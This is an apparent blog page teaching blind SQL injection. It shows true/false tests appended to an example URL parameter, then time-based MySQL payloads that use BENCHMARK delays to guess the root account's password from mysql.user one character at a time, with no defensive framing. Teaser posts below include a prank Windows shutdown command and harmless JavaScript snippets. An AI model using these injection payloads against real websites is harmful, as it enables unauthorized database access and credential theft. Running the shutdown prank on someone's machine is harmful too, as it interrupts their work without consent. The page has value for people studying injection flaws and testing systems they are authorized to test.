sql Injection

-
What is blind Sql injection ?
Blind SQL Injection is used when a web application is vulnerable to an SQL injection, but the
results of the injection are not visible to the attacker.

The page with the vulnerability may not be one that displays data but will display differently
depending on the results of a logical statement injected into the legitimate SQL statement
called for that page .

How blind sql injection can be used ?
There are several uses for the Blind Sql Injection:
Testing the vulnerability;
Finding the table name;
Finding the value and data from the website;

Testing vulnerability (MySQL - MSSQL):
Let's star with an easy example. We have this type of URL:
site.com/studentsempire.php?id=2

it will result in this type of query on the database:
SELECT * FROM news WHERE ID = 2

Now, we can try some sql injection techniques, for example the blind sql injection!
site.com/studentsempire.php?id=2 and 1=0

SQL query is now:
SELECT * FROM news WHERE ID = 2 and 1=0

In this case the query will not return anything (FALSE) because 1 is different from 0; Let's do
the litmus test: try to get the TRUE statement forcing the AND to be TRUE;

site.com/studentsempire.php?id=2 and 0=0

In this case 0 is equal to 0... Got it! We should now see the original news page. We now know
that is vulnerable to Blind Sql Injection.

Time attack (MySQL) :
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;

SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='b',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;

SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='c',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;

SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='d',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;




Comments

Post a Comment

Popular posts from this blog

Shutdown Computer With Funny Reason

-
In this code you can type in the cmd so computer has been shutdown with funny reason try and enjoy the code . Step 1 : Open CMD (Command Prompt) Step 2 : type this below command in CMD               shutdown -s  -t 500 -c "I am tired. I don't want to work anymore." (with the quotes) Step 3 : Press Enter . Note :  The -c switch is used in the code to give the reason for shutting down and what is followed in quotes will be displayed in the dialog box as the reason. This can be used to display all sorts of funny messages . First you have close all the programme before type this command because computer has been shut down from this command so .
Read more

Hidden Attribute in javascript

-
< ! DOCTYPE HTML > < html > < head > < script > var toggleHidden = function() { var elem = document.getElementById( "toggle" ); if (elem.hasAttribute( "hidden" )) { elem.removeAttribute( "hidden" ); } else { elem.setAttribute( "hidden" , "hidden" ); } } </script> </head> < body > < button onclick= "toggleHidden()" >Click </button> < table > < tr > < th >Country </th> < th >Capital </th> </tr> < tr > < td > India </td> < td > New Delhi</td> </tr> < tr id= "toggle" hidden > < td > United States</td> < td > Washington D.C. </td> </tr> < tr > < td > New Zealand </td> < td > Wellington </td> </tr> </table...
Read more

Draw animated loading spinner canvas in Javascript

-
< ! DOCTYPE html > < html > < head > < script type= 'text/javascript' src= 'http://code.jquery.com/jquery-1.8.3.js' > </script> < script type= 'text/javascript' > $(window).load(function(){ (function() { setInterval(draw, 30); var degrees = 0.0; var offset = 8; function draw() { var canvas = document.getElementById( 'tutorial' ); if (canvas.getContext) { var ctx = canvas.getContext( '2d' ); ctx.clearRect(0, 0, 16, 16); degrees += 0.10; ctx.save(); ctx.translate(offset, offset); ctx.rotate(degrees); // Draw half open circle ctx.beginPath(); ctx.lineWidth = 2; ctx.arc(8-offset , 8-offset, 6, 0, 1.75 * Math.PI); ctx.stroke(); // Draw arrowhead ...
Read more